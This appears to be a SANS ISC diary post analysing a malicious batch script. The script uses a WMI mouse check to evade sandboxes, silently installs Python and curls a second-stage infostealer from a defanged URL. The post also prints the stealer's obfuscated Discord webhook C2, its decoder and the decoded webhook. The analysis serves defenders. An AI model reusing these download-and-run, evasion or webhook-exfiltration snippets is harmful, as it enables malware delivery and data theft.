Simple Anti-Sandbox Technique: Where's The Mouse?

    Published: 2024-02-23
    Last Updated: 2024-02-23 06:23:46 UTC
    by Xavier Mertens (Version: 1)
    0 comment(s)

    Malware samples have plenty of techniques to detect if they are running in a "safe" environment. By safe, I mean a normal computer with a user between the keyboard and the chair, programs running, etc. These techniques are based on checking the presence of specific processes, registry keys, or files. The hardware can also be a good indicator (are some devices present or not?)

    Some techniques rely on basic checks that can be easily implemented in a simple Windows script (.bat) file. I found an interesting one that performs a basic check before downloading the next payload. The file has the following SHA256 hash: 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb[1]

    set "mouseConnected=false"
    
    for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do (
        set "mouseConnected=true"
    )
    
    if not !mouseConnected! == true (
        exit /b 1
    )

    The script uses the WMI ("Windows Management Instrumentation") client to query the hardware and filter interesting devices. Here is an output generated on a regular computer:

    C:\Users\REM\Desktop>wmic path Win32_PointingDevice get PNPDeviceID /value
    
    PNPDeviceID=ACPI\PNP0F13\4&1BD7F811&0
    
    PNPDeviceID=USB\VID_0E0F&PID_0003&MI_01\7&12E62A01&0&0001
    
    PNPDeviceID=USB\VID_0E0F&PID_0003&MI_00\7&12E62A01&0&0000
    

    Indeed some basic sandboxes do not have a mouse connected to them. Easy trick! Note that, in a lot of organizations, access to the "wmic" tool is prohibited for normal users because it can be used to perform a lot of sensitive actions.

    If no mouse is detected, the script will fetch its copy of a minimal Python environment and install it:

    set "eee=https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe"
    set "eeee=python-installer.exe"
    curl -L -o !eeee! !eee! --insecure --silent
    start /wait !eeee! /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0 > NUL 2>&1
    del !eeee!

    Finally, it will download and execute the second stage:

    set "ENCODED_URL=hxxps://rentry[.]co/zph33gvz/raw
    set "OUTPUT_FILE=webpage.py"
    curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure
    if %ERRORLEVEL% neq 0 (
        echo Error: Failed to download the webpage.
        exit /b 1
    )
    python -m %OUTPUT_FILE%
    del %OUTPUT_FILE%

    The second stage is another InfoStealer. Nothing special except the way the DIscord channel used as C2 is obfuscated:

    webhook = b'\xc8~~\xc9(T>>\x10\x1e(\x82=\xa1\x10\x95\x82=$>\xbc\xc9\x1e>lM1\xc8=={(>\xb08-Z-\xb3-\x8b8\x8b\x1b\xb0\xb3\xb0\xb08\x87Z\x8b>\xf91\xe0f&\x82g\xe0\xa7g\x98\xf0Y\xd60\xcdX\xb4\xb4\xfe\xa6\xc9\xc9l~Y(g\xf8\x1c&\x82\xd6Nf\x87e\xe0\xf7)\xf70e_,8\xfe\xa6Z\x1c\xe28M\xaf_\xc6,1E\xf7N_\xf2,_\x1b\ne',b'x.\x8d\\V+\xb1c\x94\x9cw\xb5\x8c\t]\x12\r\x91[5y\x8a\x15L\xe5Bq\xd0\xa5\x0c\xd9\xe8\x9f\xdd\x93J\xd4\x88\xb8\x84\xa3K\x02\x0f\xa8E\x95>-\xb08\x87\x8b\x1b\xb3\xf2\x18ZTG\x16\xb2i\xcf\x11\xb4\xf7\x07\x1cuOY\xcd\xe0_,m&\xf0\xaaX\xfeW\xaf\x90\xf9\xc6\xae\xf8\x08\n\x7f\xab\x014e\x9a\xbc1\x82\x10M)f\xc8\x1e\xd6{g$\xe2=\xc9\x98\xa1(~N\xc5l\xa6\xa70\xba/\x053\xb6b\xfd"\xde\xa4h\x9bId\xc1\xc4\xb9\x96\xf3\x83\x06\xbd2H\xc7\xc0\xd5z\xa0\x99ao\xef\x13r\x1dP7\x14v\xa2\xeek\xeb\xe1\xbf9}:R\xe7\'\xbb<DQ\x9e^\xfc\xad%\x8e\x1f\x97\xc2U\x19\x86\x17\x81\xff\xea\xfa\x9dF\xa9p!\xcc#\xc3C\x85\xdc|\xf5j;\xbeA\xec\xe4\x80\xd2\xf4S\xb7\xdb\xe9\x89\xcb\xd76\x0b\xe3`@\x92\x03\xf1s\xfbn\xf6\xd1\xda\xd3\x0e\xd8t\x00\x8f\xed\xe6\xac \xdf\x04\xca?*\x1a\xce'

    Is it decrypted using this simple function:

    def DeobfuscateWeb(encrypted_text, key):
        decrypted = [0] * 256
        for i, char in enumerate(key):
            decrypted[char] = i
    
        decrypted_text = []
        for char in encrypted_text:
            decrypted_char = decrypted[char]
            decrypted_text.append(decrypted_char)
    
        return bytes(decrypted_text)

    and returns "hxxps://discord[.]com/api/webhooks/1209060424516112394/UbIgMclIylqNGjzHPAAQxppwtGslXDMcjug3_IBfBz_JK2Qx9Dn2eSJVKb-BuJ7KJ5Z_"

    [1] https://www.virustotal.com/gui/file/460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb/detection

    Xavier Mertens (@xme)
    Xameco
    Senior ISC Handler - Freelance Cyber Security Consultant
    PGP Key

    Keywords:
    0 comment(s)
    ISC Stormcast For Friday, February 23rd, 2024 https://isc.sans.edu/podcastdetail/8866

      Comments


      Diary Archives